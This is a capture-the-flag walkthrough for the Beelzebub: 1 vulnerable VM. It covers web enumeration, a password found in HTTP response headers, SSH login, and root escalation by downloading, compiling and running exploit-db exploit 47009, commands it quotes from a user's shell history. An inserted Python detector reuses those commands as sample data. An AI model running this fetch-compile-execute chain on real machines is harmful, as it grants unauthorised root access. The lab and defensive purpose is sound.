In this article, I will be providing a walkthrough for the BEELZEBUB: 1 vulnerable VM from Vulhub.com. This is an easy-rated CTF, so it should not be too hard to follow along if you're a beginner. This box requires a bit of enumeration and some creativity at times, but overall it's not head-banging hard.
First of all, let's find our vulnerable machine:
Our vulnerable machine's IP is "192.168.99.9". Now that we have found the machine, let's do a basic "nmap" scan to see what ports are open:
We see that ports 80 (http) and 22 (ssh) are open. For now let's take a look at port 80 (http). The fact that it is open most likely means a web page is being served, which turns out to be true:
So now let's run a web directory scanner called "dirsearch" against our vulnerable machine and see what pops up:
Seems like we get some interesting results. After visiting many of the found URLs searching for clues, a hidden message is revealed to us in the page source of /index.php:
Now the two highlighted words, "beelzebub" and "md5", are the two keys to our next hint. Since md5 is a hash function and "beelzebub" is surrounded by quotation marks, let's convert "beelzebub" into an md5 hash and see what we can do with it:
After some playing around with ideas, I found that taking the md5 hash of "beelzebub" and placing it into the trusty "dirsearch" command as the base path gives us some positive results:
After sifting through some of the newly found directories, we can find a web page at "wp-content/uploads/Talk To VALAK/index.php".
On the web page we encounter an input box and a button labelled "Say Hi to VALAK!". After entering a name and clicking the button, we get prompted back with "VALAK: <name>". Now let's look further into the request sent after clicking the button. Right-click, open "Inspect Element", then click on the "Network" tab.
Then click on the POST request we made, look over at the response headers and scroll down. Look at what we found: "M4k3Ad3a1", a password.
But what is this a password for? The SSH login, of course; remember the open port 22 (SSH). But it's a password for which user? Let's find our answer with a "wpscan" user enumeration:
Looks like we found two. We will be using the username “krampus” for our ssh login.
Now that we are logged in, we need to see whether we have root privileges. Let's run the id command and see if we are in the sudo group:
Looks like we are not. So let's see if we can escalate privileges to root. After some testing, I decided to take a look into the ".bash_history" file using the "cat" command to see what we can find, and I found some activity of interest:
If you cat ".bash_history" and scroll down a bit, you see some interesting commands:
- “wget https://www.exploit-db.com/download/47009”: Downloading a file from the internet with a “wget” command.
- “mv 47009 ./exploit.c”: renaming the file to “exploit.c”.
- "gcc exploit.c -o exploit": using "gcc" with the "-o" flag to compile the file into a binary named "exploit".
- "./exploit": the "exploit" binary is being executed.
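From a defender's side, that same download -> rename -> compile -> execute sequence in a user's shell history is exactly the kind of chain a forensic triage script should flag. The following is an added example (not part of the original walkthrough) that scans history text for that pattern; the sample history is constructed from the four commands quoted above plus one harmless line, and the `.bash_history` parsing is my own simplified logic, not a tool from the write-up.

```python
import re

# Constructed sample input: the four commands the write-up quotes from
# krampus's .bash_history, plus one harmless line (not the real file).
SAMPLE_HISTORY = """\
ls -la
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
"""

RENAME_RE = re.compile(r"^mv\s+(\S+)\s+(\S+)")
COMPILE_RE = re.compile(r"^(?:gcc|cc|clang)\s+(.*?)\s+-o\s+(\S+)")
EXEC_RE = re.compile(r"^\./(\S+)")


def _basename(path: str) -> str:
    """'./exploit.c' -> 'exploit.c'; 'https://x/download/47009' -> '47009'."""
    return path.rstrip("/").rsplit("/", 1)[-1]


def find_exploit_chains(history: str) -> list[dict]:
    """Return one record per download -> (rename) -> compile -> execute chain."""
    downloaded = {}  # local file name -> (url, history line number)
    compiled = {}    # binary name -> (source file name, history line number)
    chains = []
    for line_no, raw in enumerate(history.splitlines(), start=1):
        line = raw.strip()
        tokens = line.split()
        if tokens and tokens[0] in ("wget", "curl"):
            # Treat the first non-flag argument as the URL being fetched.
            url = next((t for t in tokens[1:] if not t.startswith("-")), None)
            if url:
                downloaded[_basename(url)] = (url, line_no)
        elif m := RENAME_RE.match(line):
            src, dst = _basename(m.group(1)), _basename(m.group(2))
            if src in downloaded:  # follow the downloaded file under its new name
                downloaded[dst] = downloaded.pop(src)
        elif m := COMPILE_RE.match(line):
            for tok in m.group(1).split():
                if _basename(tok) in downloaded:
                    compiled[_basename(m.group(2))] = (_basename(tok), line_no)
        elif m := EXEC_RE.match(line):
            binary = _basename(m.group(1))
            if binary in compiled:
                source, compile_line = compiled[binary]
                url, dl_line = downloaded[source]
                chains.append({"url": url, "source": source, "binary": binary,
                               "lines": (dl_line, compile_line, line_no)})
    return chains
```

Each returned record carries the history line numbers of the download, compile and execute steps, which is what you would cite in an incident timeline.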
Before we follow along with the commands, let's download the "47009" file with the "wget" command so we can do a small investigation:
Let's "cat" the file and see what pops up:
Looks like it's a privilege escalation exploit. Let's follow the steps from the ".bash_history" file, execute it and see what happens:
Looks like we now have root access: